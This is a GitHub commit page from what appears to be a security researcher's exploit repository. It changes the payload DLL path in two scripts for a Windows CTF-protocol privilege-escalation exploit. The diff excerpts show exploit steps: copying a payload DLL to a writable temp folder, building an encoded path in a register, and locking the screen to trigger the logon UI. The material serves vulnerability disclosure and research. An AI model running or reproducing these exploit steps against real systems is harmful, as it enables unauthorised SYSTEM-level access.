Skip to content
Permalink
Browse files

fix #8, references to old payload path

  • Loading branch information...
taviso committed Aug 14, 2019
1 parent 0c2e624 commit 6b2d85091fbb5ddfe334410a8a5aac013aba0d03
Showing with 4 additions and 4 deletions.
  1. +1 −1 scripts/ctf-exploit-common-win10.ctf
  2. +3 −3 scripts/ctf-logonui-system.ctf
@@ -417,7 +417,7 @@ sub r1 1
and r1 0xff
repeat r1 callstub 0 0 r3

print Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"...
print Writing in the payload path "C:\TEMP\EXPLOIT.DLL"...

# And finally, lets load "../TEMP/EXPLOIT", which should be writable by all users.
set r2 0x5c504d45545c3a43
@@ -10,9 +10,9 @@ run XCOPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL*

# Print a warning if that didnt work.
repeat rc print
repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
repeat rc print !!! THIS EXPLOIT REQUIRES C:\WINDOWS\TEMP\EXPLOIT.DLL TO EXIST !!!
repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
repeat rc print !!! THIS EXPLOIT REQUIRES C:\TEMP\EXPLOIT.DLL TO EXIST !!!
repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
repeat rc print
print
print The screen will lock to trigger the login screen in 5 seconds...

0 comments on commit 6b2d850

Please sign in to comment.
You can’t perform that action at this time.